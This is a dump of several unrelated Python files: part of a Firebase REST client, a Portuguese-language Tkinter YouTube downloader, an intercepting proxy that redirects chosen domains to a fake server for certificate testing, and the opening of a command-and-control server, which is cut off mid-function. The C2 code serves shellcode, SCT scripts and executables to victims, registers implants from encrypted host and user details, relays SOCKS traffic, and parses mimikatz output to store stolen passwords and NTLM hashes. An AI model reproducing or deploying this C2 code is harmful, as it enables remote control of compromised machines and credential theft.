request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getAccountInfo?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_email_verification(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "VERIFY_EMAIL", "idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_password_reset_email(self, email):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "PASSWORD_RESET", "email": email})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def verify_password_reset_code(self, reset_code, new_password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/resetPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"oobCode": reset_code, "newPassword": new_password})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def create_user_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8" }
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
class Database:
""" Database Service """
def __init__(self, credentials, api_key, database_url, requests):
if not database_url.endswith('/'):
url = ''.join([database_url, '/'])
else:
url = database_url
self.credentials = credentials
self.api_key = api_key
self.database_url = url
self.requests = requests
self.path = ""
self.build_query = {}
self.last_push_time = 0
self.last_rand_chars = []
def order_by_key(self):
self.build_query["orderBy"] = "$key"
return self
def order_by_value(self):
self.build_query["orderBy"] = "$value"
return self
def order_by_child(self, order):
self.build_query["orderBy"] = order
return self
def start_at(self, start):
self.build_query["startAt"] = start
return self
def end_at(self, end):
self.build_query["endAt"] = end
return self
def equal_to(self, equal):
self.build_query["equalTo"] = equal
return self
def limit_to_first(self, limit_first):
self.build_query["limitToFirst"] = limit_first
return self
def limit_to_last(self, limit_last):
self.build_query["limitToLast"] = limit_last
return self
def shallow(self):
self.build_query["shallow"] = True
return self
def child(self, *args):
new_path = "/".join([str(arg) for arg in args])
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def build_request_url(self, token):
parameters = {}
if token:
parameters['auth'] = token
for param in list(self.build_query):
if type(self.build_query[param]) is str:
parameters[param] = quote('"' + self.build_query[param] + '"')
elif type(self.build_query[param]) is bool:
parameters[param] = "true" if self.build_query[param] else "false"
else:
parameters[param] = self.build_query[param]
# reset path and build_query for next query
request_ref = '{0}{1}.json?{2}'.format(self.database_url, self.path, urlencode(parameters))
self.path = ""
self.build_query = {}
return request_ref
def build_headers(self, token=None):
headers = {"content-type": "application/json; charset=UTF-8"}
if not token and self.credentials:
access_token = self.credentials.get_access_token().access_token
headers['Authorization'] = 'Bearer ' + access_token
return headers
def get(self, token=None, json_kwargs={}):
build_query = self.build_query
query_key = self.path.split("/")[-1]
request_ref = self.build_request_url(token)
# headers
headers = self.build_headers(token)
# do request
request_object = self.requests.get(request_ref, headers=headers)
raise_detailed_error(request_object)
request_dict = request_object.json(**json_kwargs)
# if primitive or simple query return
if isinstance(request_dict, list):
return PyreResponse(convert_list_to_pyre(request_dict), query_key)
if not isinstance(request_dict, dict):
return PyreResponse(request_dict, query_key)
if not build_query:
return PyreResponse(convert_to_pyre(request_dict.items()), query_key)
# return keys if shallow
if build_query.get("shallow"):
return PyreResponse(request_dict.keys(), query_key)
# otherwise sort
sorted_response = None
if build_query.get("orderBy"):
if build_query["orderBy"] == "$key":
sorted_response = sorted(request_dict.items(), key=lambda item: item[0])
elif build_query["orderBy"] == "$value":
sorted_response = sorted(request_dict.items(), key=lambda item: item[1])
else:
sorted_response = sorted(request_dict.items(), key=lambda item: item[1][build_query["orderBy"]])
return PyreResponse(convert_to_pyre(sorted_response), query_key)
def push(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.post(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def set(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.put(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def update(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.patch(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def remove(self, token=None):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.delete(request_ref, headers=headers)
raise_detailed_error(request_object)
return request_object.json()
def stream(self, stream_handler, token=None, stream_id=None):
request_ref = self.build_request_url(token)
return Stream(request_ref, stream_handler, self.build_headers, stream_id)
def check_token(self, database_url, path, token):
if token:
return '{0}{1}.json?auth={2}'.format(database_url, path, token)
else:
return '{0}{1}.json'.format(database_url, path)
def generate_key(self):
push_chars = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
now = int(time.time() * 1000)
duplicate_time = now == self.last_push_time
self.last_push_time = now
time_stamp_chars = [0] * 8
for i in reversed(range(0, 8)):
time_stamp_chars[i] = push_chars[now % 64]
now = int(math.floor(now / 64))
new_id = "".join(time_stamp_chars)
if not duplicate_time:
for i in range(0, 12):
self.last_rand_chars.append(int(math.floor(uniform(0, 1) * 64)))
else:
for i in range(0, 11):
if self.last_rand_chars[i] == 63:
self.last_rand_chars[i] = 0
self.last_rand_chars[i] += 1
for i in range(0, 12):
new_id += push_chars[self.last_rand_chars[i]]
return new_id
def sort(self, origin, by_key):
# unpack pyre objects
pyres = origin.each()
new_list = []
for pyre in pyres:
new_list.append(pyre.item)
# sort
data = sorted(dict(new_list).items(), key=lambda item: item[1][by_key])
return PyreResponse(convert_to_pyre(data), origin.key())
class Storage:
""" Storage Service """
def __init__(self, credentials, storage_bucket, requests):
self.storage_bucket = "https://firebasestorage.googleapis.com/v0/b/" + storage_bucket
self.credentials = credentials
self.requests = requests
self.path = ""
if credentials:
client = storage.Client(credentials=credentials, project=storage_bucket)
self.bucket = client.get_bucket(storage_bucket)
def child(self, *args):
new_path = "/".join(args)
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def put(self, file, token=None):
# reset path
path = self.path
self.path = None
if isinstance(file, str):
file_object = open(file, 'rb')
else:
file_object = file
request_ref = self.storage_bucket + "/o?name={0}".format(path)
if token:
headers = {"Authorization": "Firebase " + token}
request_object = self.requests.post(request_ref, headers=headers, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
elif self.credentials:
blob = self.bucket.blob(path)
if isinstance(file, str):
return blob.upload_from_filename(filename=file)
else:
return blob.upload_from_file(file_obj=file)
else:
request_object = self.requests.post(request_ref, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
def delete(self, name):
self.bucket.delete_blob(name)
def download(self, filename, token=None):
# remove leading backlash
path = self.path
url = self.get_url(token)
self.path = None
if path.startswith('/'):
path = path[1:]
if self.credentials:
blob = self.bucket.get_blob(path)
blob.download_to_filename(filename)
else:
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r:
f.write(chunk)
def get_url(self, token):
path = self.path
self.path = None
if path.startswith('/'):
path = path[1:]
if token:
return "{0}/o/{1}?alt=media&token={2}".format(self.storage_bucket, quote(path, safe=''), token)
return "{0}/o/{1}?alt=media".format(self.storage_bucket, quote(path, safe=''))
def list_files(self):
return self.bucket.list_blobs()
def raise_detailed_error(request_object):
try:
request_object.raise_for_status()
except HTTPError as e:
# raise detailed error message
# TODO: Check if we get a { "error" : "Permission denied." } and handle automatically
raise HTTPError(e, request_object.text)
def convert_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre(item))
return pyre_list
def convert_list_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre([items.index(item), item]))
return pyre_list
class PyreResponse:
def __init__(self, pyres, query_key):
self.pyres = pyres
self.query_key = query_key
def val(self):
if isinstance(self.pyres, list):
# unpack pyres into OrderedDict
pyre_list = []
# if firebase response was a list
if isinstance(self.pyres[0].key(), int):
for pyre in self.pyres:
pyre_list.append(pyre.val())
return pyre_list
# if firebase response was a dict with keys
for pyre in self.pyres:
pyre_list.append((pyre.key(), pyre.val()))
return OrderedDict(pyre_list)
else:
# return primitive or simple query results
return self.pyres
def key(self):
return self.query_key
def each(self):
if isinstance(self.pyres, list):
return self.pyres
class Pyre:
def __init__(self, item):
self.item = item
def val(self):
return self.item[1]
def key(self):
return self.item[0]
class KeepAuthSession(Session):
"""
A session that doesn't drop Authentication on redirects between domains.
"""
def rebuild_auth(self, prepared_request, response):
pass
class ClosableSSEClient(SSEClient):
def __init__(self, *args, **kwargs):
self.should_connect = True
super(ClosableSSEClient, self).__init__(*args, **kwargs)
def _connect(self):
if self.should_connect:
super(ClosableSSEClient, self)._connect()
else:
raise StopIteration()
def close(self):
self.should_connect = False
self.retry = 0
self.resp.raw._fp.fp.raw._sock.shutdown(socket.SHUT_RDWR)
self.resp.raw._fp.fp.raw._sock.close()
class Stream:
def __init__(self, url, stream_handler, build_headers, stream_id):
self.build_headers = build_headers
self.url = url
self.stream_handler = stream_handler
self.stream_id = stream_id
self.sse = None
self.thread = None
self.start()
def make_session(self):
"""
Return a custom session object to be passed to the ClosableSSEClient.
"""
session = KeepAuthSession()
return session
def start(self):
self.thread = threading.Thread(target=self.start_stream)
self.thread.start()
return self
def start_stream(self):
self.sse = ClosableSSEClient(self.url, session=self.make_session(), build_headers=self.build_headers)
for msg in self.sse:
if msg:
msg_data = json.loads(msg.data)
msg_data["event"] = msg.event
if self.stream_id:
msg_data["stream_id"] = self.stream_id
self.stream_handler(msg_data)
def close(self):
while not self.sse and not hasattr(self.sse, 'resp'):
time.sleep(0.001)
self.sse.running = False
self.sse.close()
self.thread.join()
return self
|
main.py
|
from tkinter import *
from tkinter import messagebox
from tkinter.font import Font
from tkinter import filedialog
from ytbdownloader import *
from threading import Thread
def choise_path():
global savelocal
savelocal = str(filedialog.askdirectory())
label_saveWhere.config(text=savelocal[savelocal.rfind('/')+1:], anchor=CENTER)
def download():
url = tb_url.get()
op = option.get()
try:
yt = YtbDownloader()
if chkvalue.get():
yt.download_playlist(url=url, savelocal=savelocal, tomp3=op)
else:
if op:
yt.download_and_convertmp3(url=url, savelocal=savelocal)
else:
yt.download_video(url=url, savelocal=savelocal)
except Exception as exc:
print(exc)
messagebox.showerror(title=":(", message="HOUVE UM PROBLEMA, VERIFIQUE A URL DO VIDEO")
else:
messagebox.showinfo(title=":)", message="BAIXADO COM SUCESSO")
tb_url.delete(0, END)
app = Tk()
savelocal = None
option = BooleanVar()
app.geometry("400x300")
app.configure(background='orange')
font = Font(size=10, weight='bold')
Label(app, text="YOUTUBER DOWNLOADER", font=font).place(x=100, y=5, height=25, width=200)
Label(app, text="URL DO VIDEO: ", font=font).place(x=140, y=35, height=25, width=120)
tb_url = Entry(app)
tb_url.place(x=75, y=65, height=25, width=250)
Label(app, text="PLAYLIST", font=font).place(x=140, y=95, width=90, height=25)
chkvalue = BooleanVar()
chkvalue.set(False)
chkbuttom = Checkbutton(app, var=chkvalue)
chkbuttom.place(x=235, y=95, width=30, height=25)
Button(app, text="DIRETORIO:", command=choise_path, font=font).place(x=75, y=125, height=25, width=120)
label_saveWhere = Label(app, text='', font=font, anchor=W)
label_saveWhere.place(x=200, y=125, height=25, width=125)
Rb1 = Radiobutton(app, text="MÚSICA(MP3)", background='white', font=font, variable=option, value=True)
Rb1.place(x=50, y=170, height=25, width=120)
Rb2 = Radiobutton(app, text="VÍDEO(MP4)", font=font, background='white', variable=option, value=False)
Rb2.place(x=230, y=170, height=25, width=120)
#task = Thread(target=download)
Button(app, text="BAIXAR", font=font, command=download).place(x=140, y=220, height=25, width=120)
app.mainloop()
|
ProxyServer.py
|
__author__ = 'n3k'
import SocketServer
import time
import socket
from select import select
from HttpData import HttpRequest, HttpResponse, HttpDataException
from Logger import Logger
from ProxyModeTestController import TestProxyModeController
from TestController import TestControllerException
from Configuration import Configuration
class ProxyThreadedServer(SocketServer.ThreadingTCPServer):
def __init__(self, server_address, RequestHandlerClass):
SocketServer.ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass)
self.allow_reuse_address = True
class Destination(object):
"""
This is used because some browsers (like Firefox) use a single socket
to send data to different hosts
"""
def __init__(self, socket_connection, host, port, address):
self.socket_connection = socket_connection
self.host = host
self.port = port
self.address = address
class ProxyHandler(SocketServer.BaseRequestHandler):
"""
This is an asynchronous handler
"""
timeout = None
# Disable nagle algorithm for this socket, if True.
disable_nagle_algorithm = False
def __init__(self, request, client_address, server):
self.http_data = None
self.current_socket = None
self.keep_alive = False
self.readable_sockets = []
self.destination_list = []
self.current_destination = None
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
def setup(self):
self.connection = self.request
if self.timeout is not None:
self.connection.settimeout(self.timeout)
if self.disable_nagle_algorithm:
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
self.readable_sockets.append(self.request)
def handle(self):
if self._read_initial_client_request() > 0:
if self.http_data.request_method == "CONNECT":
self.process_connect()
else:
self.process_generic_request()
def finish(self):
self.request.close()
for destination in self.destination_list:
try:
destination.socket_connection.close()
except:
pass
def _read_initial_client_request(self):
"""
Reads the client socket and returns the len of bytes received
"""
try:
self.http_data = HttpRequest.parse(self._recv_timeout(self.request))
return len(self.http_data)
except HttpDataException:
return 0
def get_destination_from_data(self):
host, port = self._get_host_and_port()
#print host, port
address = socket.gethostbyname(host)
for destination in self.destination_list:
if destination.host == host and destination.port == port and destination.address == address:
return destination
# If we don't find it, create a new Destination object
connection = self.create_connection(address, port)
new_destination = Destination(connection, host, port, address)
self.destination_list.append(new_destination)
return new_destination
def process_generic_request(self):
# Set keep_alive if necessary
if self.http_data.has_keepalive():
self.keep_alive = True
self.current_destination = self.get_destination_from_data()
# Set up the forward channel
self.forward_http_channel()
def create_connection(self, address, port):
"""
Creates connection with the destination and adds the socket to the readable list
"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address, port))
self.readable_sockets.append(s)
return s
except Exception as e:
Logger().log_error("## {0} - While trying to connect to {1} at port {2}".format(e.message, address, port))
return None
def forward_http_channel(self):
# Send the already parsed data (the first request)
self.send_data(socket_to=self.current_destination.socket_connection, data=repr(self.http_data))
# Channel loop
if self.keep_alive:
while self.keep_alive:
self._forward_remaining_data()
else:
# Send and receive the data and finish the thing
self.send_data(socket_to=self.request, data=self._recv_timeout(self.current_destination.socket_connection))
def _forward_remaining_data(self):
"""
Reads data from the socket list and forwards properly
"""
timeout = 10
readable, writable, exceptional = select(self.readable_sockets, [], [], timeout)
for self.current_socket in readable:
data = self._recv_timeout(self.current_socket)
if self.current_socket is self.request:
# We know is an HTTP Request
try:
self.http_data = HttpRequest.parse(data)
# Some clients re-use the socket established with the proxy to send
# data to several hosts
self.current_destination = self.get_destination_from_data()
if not self.http_data.has_keepalive():
self.keep_alive = False
except HttpDataException:
#self.readable_sockets.remove(self.request)
continue
else:
# We know is an HTTP Response or Response data
try:
self.http_data = HttpResponse.parse(data)
except HttpDataException:
# It could be something else like a chunked response or who knows xD
if len(data) > 0:
# In this particular case, send data directly
self.send_data(socket_to=self.request, data=data)
else:
self.readable_sockets.remove(self.current_destination.socket_connection)
self.destination_list.remove(self.current_destination)
self.keep_alive = False
continue
self.send_data(socket_to=self.__get_peer_socket(), data=repr(self.http_data))
def send_data(self, socket_to, data):
#().log_http(self.http_data)
#print self.http_data
try:
socket_to.sendall(data)
except Exception as e:
print e.message
self.keep_alive = False
def __get_peer_socket(self):
if self.current_socket is self.request:
return self.current_destination.socket_connection
return self.request
def process_connect(self):
# Set keep_alive if necessary
if self.http_data.has_keepalive():
self.keep_alive = True
self.current_destination = self.get_destination_from_data()
# Else Reply 200 Connection Established and forward data
self.send_data(socket_to=self.request, data="HTTP/1.0 200 Connection established\r\n\r\n")
# Forward data
self.forward_https_channel()
def forward_https_channel(self):
timeout = 10
if self.keep_alive:
while self.keep_alive:
readable, writable, exceptional = select(self.readable_sockets, [], [], timeout)
for self.current_socket in readable:
try:
data = self._recv_timeout(self.current_socket)
self.send_data(socket_to=self.__get_peer_socket(), data=data)
except:
return
if len(readable) == 0:
return
def _recv_timeout(self, s, timeout=0.5):
#make socket non blocking
s.setblocking(0)
total_data = []
data = ''
#beginning time
begin = time.time()
while True:
#if you got some data, then break after timeout
if total_data and time.time()-begin > timeout:
break
#if you got no data at all, wait a little longer, twice the timeout
elif time.time()-begin > timeout*2:
break
#recv chunks of 0x2000
try:
data = s.recv(0x2000)
if data:
total_data.append(data)
#change the beginning time for measurement
begin = time.time()
else:
#sleep for sometime to indicate a gap
time.sleep(0.1)
except:
pass
return ''.join(total_data)
def _get_host_and_port(self):
if ":" in self.http_data.host:
host, port = self.http_data.host.split(":")
port = int(port)
# just in case a whitespace is there
host = host.strip()
else:
host = self.http_data.host.strip()
if self.http_data.request_method == "CONNECT":
port = 443
else:
port = 80
return host, port
class ProxyHandlerCertificateTest(ProxyHandler):
def setup(self):
ProxyHandler.setup(self)
self.client_address = self.request.getsockname()[0]
def finish(self):
"""Overwrite the finish() to include the killing of the web_server"""
if self.current_destination:
TestProxyModeController.instance(self.client_address,
self.current_destination.host,
self.current_destination.port).cleanup()
ProxyHandler.finish(self)
def redirect_destination(self):
#try:
server_address = TestProxyModeController.instance(self.client_address,
self.current_destination.host,
self.current_destination.port).configure_web_server()
if server_address == None:
return
if Configuration().verbose_mode:
print "Web Server for host %s listening at %s on port %d" % (self.current_destination.host, server_address[0], server_address[1])
#except TestControllerException:
# This means the TestSuite finished, do not redirect anymore
#return
address, port = server_address
# Remove the created connection to the original destination
self.readable_sockets.remove(self.current_destination.socket_connection)
# Create the new connection to our fake server
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server_address)
self.readable_sockets.append(s)
self.current_destination.socket_connection = s
except Exception as e:
Logger().log_error("## FakeServer connection error - While trying to connect to {1} at port {2}".format(address, port))
def process_connect(self):
# Set keep_alive if necessary
if self.http_data.has_keepalive():
self.keep_alive = True
self.current_destination = self.get_destination_from_data()
if TestProxyModeController.match_monitored_domains(self.current_destination.host):
self.redirect_destination()
# Else Reply 200 Connection Established and forward data
self.send_data(socket_to=self.request, data="HTTP/1.0 200 Connection established\r\n\r\n")
# Forward data
self.forward_https_channel()
class ProxyServer(object):
def __init__(self, server_address=("0.0.0.0", 8080), proxy_handler=ProxyHandler):
self.server_address = server_address
self.proxy_handler = proxy_handler
def start(self):
server = ProxyThreadedServer(self.server_address, self.proxy_handler)
server.serve_forever()
#proxy = threading.Thread(target=server.serve_forever)
#proxy.setDaemon(True)
#proxy.start()
if __name__ == "__main__":
proxy = ProxyServer()
proxy.start()
|
C2Server.py
|
#!/usr/bin/env python3
import os, sys, datetime, time, base64, logging, signal, re, ssl, traceback, threading
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from Implant import Implant
from Tasks import newTask
from Core import decrypt, encrypt, default_response, decrypt_bytes_gzip
from Colours import Colours
from DB import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all, get_sharpurls
from DB import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey, insert_cred, get_c2_messages
from Payloads import Payloads
from Config import ROOTDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP, SocksHost
from Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, ServerPort, urlConfig, HOST_NAME, PORT_NUMBER
from Config import DownloadURI, Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken
from Config import APIUser, EnableNotifications
from Cert import create_self_signed_cert
from Help import logopic
from Utils import validate_sleep_time, randomuri, gen_key
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
def process_mimikatz(lines):
# code source https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py
main_count = 0
current = {}
for line in lines.split('\n'):
main_count += 1
val = re.match(r'^\s*\*\s+Username\s+:\s+(.+)\s*$', line.strip())
if val is not None:
current = {}
current['Username'] = val.group(1).strip()
if current['Username'] == '(null)':
current['Username'] = None
continue
val = re.match(r'^\s*\*\s+Domain\s+:\s+(.+)\s*$', line.strip())
if val is not None:
current['Domain'] = val.group(1).strip()
if current['Domain'] == '(null)':
current['Domain'] = None
continue
val = re.match(r'^\s*\*\s+(NTLM|Password)\s+:\s+(.+)\s*$', line.strip())
if val is not None and "Username" in current and "Domain" in current:
if val.group(2).count(" ") < 10:
current[val.group(1).strip()] = val.group(2)
if val.group(1) == "Password":
if val.group(2) == '(null)':
continue
insert_cred(current['Domain'], current['Username'], current['Password'], None)
elif val.group(1) == "NTLM":
if val.group(2) == '(null)':
continue
insert_cred(current['Domain'], current['Username'], None, current['NTLM'])
class MyHandler(BaseHTTPRequestHandler):
def signal_handler(signal, frame):
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def log_message(self, format, *args):
try:
useragent = str(self.headers['user-agent'])
except Exception:
useragent = "None"
open("%swebserver.log" % ROOTDIR, "a").write("%s - [%s] %s %s\n" %
(self.address_string(), self.log_date_time_string(), format % args, useragent))
def do_HEAD(s):
"""Respond to a HEAD request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_OPTIONS(s):
"""Respond to a HEAD request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_PUT(s):
"""Respond to a PUT request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(s.path), str(s.headers))
new_implant_url = get_newimplanturl()
s.cookieHeader = s.headers.get('Cookie')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(s.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
s.server_version = ServerHeader
s.sys_version = ""
if not s.cookieHeader:
s.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(s.path)
if new_task:
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(new_task)
elif [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % ROOTDIR, "a").write("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (s.address_string(), s.log_date_time_string(), SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % s.cookieHeader, 'User-Agent': UserAgent})
res = urlopen(r)
sharpout = res.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.send_header("Connection", "close")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
if (len(sharpout) > 0):
s.wfile.write(sharpout)
except HTTPError as e:
s.send_response(e.code)
s.send_header("Content-type", "text/html")
s.send_header("Connection", "close")
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in s.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in s.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in s.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in s.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in s.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in s.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in s.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in s.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c) for c in content)
s.send_response(200)
s.send_header("Content-type", "text/plain")
s.end_headers()
s.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in s.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "application/x-msdownload")
s.end_headers()
s.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in s.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "application/x-msdownload")
s.end_headers()
s.wfile.write(content)
# register new implant
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
implant_type = "PS"
if s.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if s.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if s.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if s.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if s.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if s.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if s.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if s.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if implant_type.startswith("C#"):
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.SharpCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
else:
try:
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
